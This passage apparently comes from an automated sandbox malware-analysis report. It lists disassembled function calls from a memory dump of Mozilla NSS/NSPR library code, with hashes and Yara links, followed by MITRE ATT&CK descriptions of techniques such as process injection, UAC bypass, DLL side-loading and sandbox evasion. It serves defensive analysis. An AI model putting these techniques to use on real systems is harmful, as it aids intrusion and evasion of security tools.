Part of subcall function 6C7BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9

PK11_FreeSymKey.NSS3(?,6C805D40,00000000,?,?,6C7F6AC6,6C80639C), ref: 6C81AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C805D40,00000000,?,?,6C7F6AC6,6C80639C), ref: 6C81AC59
free.MOZGLUE(8CB6FF01,6C7F6AC6,6C80639C,?,?,?,?,?,?,?,?,?,6C805D40,00000000,?,6C80AAD4), ref: 6C81AC62

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 327db47b81629ce45ae49c546132406a671d97ca4662c3536b6cf665e6eb230b
Instruction ID: a604e2451f8c99ed1a36a1aa056ce3afacbcfd170d615538c2e4bbaa8f1aaf60
Opcode Fuzzy Hash: 327db47b81629ce45ae49c546132406a671d97ca4662c3536b6cf665e6eb230b
Instruction Fuzzy Hash: 80018FB56002019FDB10DF15EAC4B8677E8AF0471CF188468E8098FB06E731E848CBA1

Function 6C7CFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C779003,?), ref: 6C7CFD91

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

PORT_Alloc_Util.NSS3(A4686C7D,?), ref: 6C7CFDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7D,?,?), ref: 6C7CFDC4
free.MOZGLUE(00000000,?,?), ref: 6C7CFDD1

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: 8403779e9a21c280139d7597122b6abcc5628f465bf6fe66906d3d6fc6160cbb
Instruction ID: 28512339373e903ebe3632198e86f52735f262d624691267baf88fdd694ce8ea
Opcode Fuzzy Hash: 8403779e9a21c280139d7597122b6abcc5628f465bf6fe66906d3d6fc6160cbb
Instruction Fuzzy Hash: 36F028F17012035FEB004F55DE958177758EF40798B108035ED088AB02E721E814C3F2

Function 6C88CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C88CC61
free.MOZGLUE ref: 6C88CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C88CC80
free.MOZGLUE(?), ref: 6C88CC87

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: e74f586d818228a5a950ab09dae3b6012bd41758db257951ea0c7a60814b9ff2
Instruction ID: 5447092ed3c93a3209bb6c0b411e3414a8654ba415925ba3e435b610ded7132f
Opcode Fuzzy Hash: e74f586d818228a5a950ab09dae3b6012bd41758db257951ea0c7a60814b9ff2
Instruction Fuzzy Hash: E8E065B6700608AFCA10EFA9DC48C8777BCEE492743150535E691C3701D232F905CBE1

Function 6C769DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6C769E1F

Part of subcall function 6C7213C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C6F2352,?,00000000,?,?), ref: 6C721413
Part of subcall function 6C7213C0: memcpy.VCRUNTIME140(00000000,R#ol,00000002,?,?,?,?,6C6F2352,?,00000000,?,?), ref: 6C7214C0

Strings

ESCAPE expression must be a single character, xrefs: 6C769F78
LIKE or GLOB pattern too complex, xrefs: 6C76A006

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: f64764af601544f351e8dcbca8f37271b3967d4fd0836fb7856dc5fb1b065302
Instruction ID: f7ce8581068b17a204bfe28e0659e3cbee5affd78421a899f836bdc2bcba3861
Opcode Fuzzy Hash: f64764af601544f351e8dcbca8f37271b3967d4fd0836fb7856dc5fb1b065302
Instruction Fuzzy Hash: 2B812C71A042558BDB00CF3AC2903EAB7F2AF55318F298679DCA49BF85D736D846C790

Function 6C7C4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7C4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C7C4DE6

Strings

%d.%d, xrefs: 6C7C4DDE

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: db05111ebf49a84152b1063b0a2011c1f6bf54cd82b1e80287d603aa38f9c647
Instruction ID: af9c816e45c54f2c68671c2b210d1b6e01f10693eee91ce7df2e9a7122ec88ee
Opcode Fuzzy Hash: db05111ebf49a84152b1063b0a2011c1f6bf54cd82b1e80287d603aa38f9c647
Instruction Fuzzy Hash: C831ECB2E042196FEB606BA59D06BFF7768EF44308F050439ED155B741EB349909CBE2

Function 6C7E4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8~l,00000000,00000000,?,?,6C7E3827,?,00000000), ref: 6C7E4D0A

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C7E4D22

Part of subcall function 6C7CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C771A3E,00000048,00000054), ref: 6C7CFD56

Strings

'8~l, xrefs: 6C7E4D07

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8~l
API String ID: 1521942269-3277948344
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 14b88311de2a8c24bd9814c1e7f1e0e155d9228babcf0038d57b265bbd2928f3
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: B5F09C3360113557DB108DEA9E4578736DC9B4967DF1502B1DE18CBB81E631DC04D6D1

Function 6C80AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C80AF78

Part of subcall function 6C76ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76ACE2
Part of subcall function 6C76ACC0: malloc.MOZGLUE(00000001), ref: 6C76ACEC
Part of subcall function 6C76ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C76AD02
Part of subcall function 6C76ACC0: TlsGetValue.KERNEL32 ref: 6C76AD3C
Part of subcall function 6C76ACC0: calloc.MOZGLUE(00000001,?), ref: 6C76AD8C
Part of subcall function 6C76ACC0: PR_Unlock.NSS3 ref: 6C76ADC0
Part of subcall function 6C76ACC0: PR_Unlock.NSS3 ref: 6C76AE8C
Part of subcall function 6C76ACC0: free.MOZGLUE(?), ref: 6C76AEAB

memcpy.VCRUNTIME140(6C8D3084,6C8D02AC,00000090), ref: 6C80AF94

Strings

SSL, xrefs: 6C80AF73

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 1a699602c92649c46315f1d239454c2203172b82bc56c24efa8f1a196e4f4e4f
Instruction ID: 5288de2edf472615e7704720d86234fd2da7c95328726bc85a96001d5712e691
Opcode Fuzzy Hash: 1a699602c92649c46315f1d239454c2203172b82bc56c24efa8f1a196e4f4e4f
Instruction Fuzzy Hash: CC2108B2705A48AA8B30EF51AA477237AB1B30261CB945938C1191BF26D7316D4CDFE6

Function 6C760F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B

Part of subcall function 6C761370: GetSystemInfo.KERNEL32(?,?,?,?,6C760936,?,6C760F20,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000), ref: 6C76138F

PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

Part of subcall function 6C761110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C760936,00000001,00000040), ref: 6C761130
Part of subcall function 6C761110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C760936,00000001,00000040), ref: 6C761142
Part of subcall function 6C761110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C760936,00000001), ref: 6C761167

Strings

clock, xrefs: 6C760F20

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: e731fff55e9371f81c8d3c3c2e048ba8f811e912475d452494f70806ade457d6
Instruction ID: 61929b0b87c4588932b92136ba46bfab1a1f9cad0c9cd5dda9a8de449e537789
Opcode Fuzzy Hash: e731fff55e9371f81c8d3c3c2e048ba8f811e912475d452494f70806ade457d6
Instruction Fuzzy Hash: 78D0123160414457C52166979D4DB96B6ACC7C33BDF104836E50982E104A69A8EBD7A9

Function 6C7D0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C7D0DF5
TlsGetValue.KERNEL32 ref: 6C7D0E2D
TlsGetValue.KERNEL32 ref: 6C7D0E58
TlsGetValue.KERNEL32 ref: 6C7D0E84

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 005b7d311062e9d650b6d584e14bce5770ea81111895727b82966556dcac03c5
Instruction ID: b9c7916fb01f9b381a93057360f567a8a359bd020bb0ef244caf01cef47716e8
Opcode Fuzzy Hash: 005b7d311062e9d650b6d584e14bce5770ea81111895727b82966556dcac03c5
Instruction Fuzzy Hash: 21319070A453868BDB20BF3996882597BB8BF0630CF46567DDC8887A11EB34E495CBC1

Function 6C7D0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C772AF5,?,?,?,?,?,6C770A1B,00000000), ref: 6C7D0F1A
malloc.MOZGLUE(00000001), ref: 6C7D0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7D0F42
TlsGetValue.KERNEL32 ref: 6C7D0F5B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 075f987c3b8b649c5ce005a465267a9db6a8306b4dc2d8041fe112a23c30ced7
Instruction ID: 987d57fc49b6f6251de7a21453bb899bc401ad5c2e770e8f7d30277c6ed8a985
Opcode Fuzzy Hash: 075f987c3b8b649c5ce005a465267a9db6a8306b4dc2d8041fe112a23c30ced7
Instruction Fuzzy Hash: 0701FCB1E012905BEB202B3E9F089567AACEF5325DF161535EC1CC2E21E730E955C6E3

Function 6C781EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C781ECE
free.MOZGLUE(?), ref: 6C781EDF
free.MOZGLUE(?), ref: 6C781EEF
free.MOZGLUE(?), ref: 6C781EF5

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9cd7710c49791c7774c58cc12135a3dbe1fd84380700b5d09cbe3b9e6269cbb0
Instruction ID: e0391e25d0c1f925568d8cde4a390575bef001bac99ddd802d6e520dee6aa73d
Opcode Fuzzy Hash: 9cd7710c49791c7774c58cc12135a3dbe1fd84380700b5d09cbe3b9e6269cbb0
Instruction Fuzzy Hash: 02F0B4B17011016BEB109B6ADC89D27736CEF45199B040434ED19C3A00D726F511C6F1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
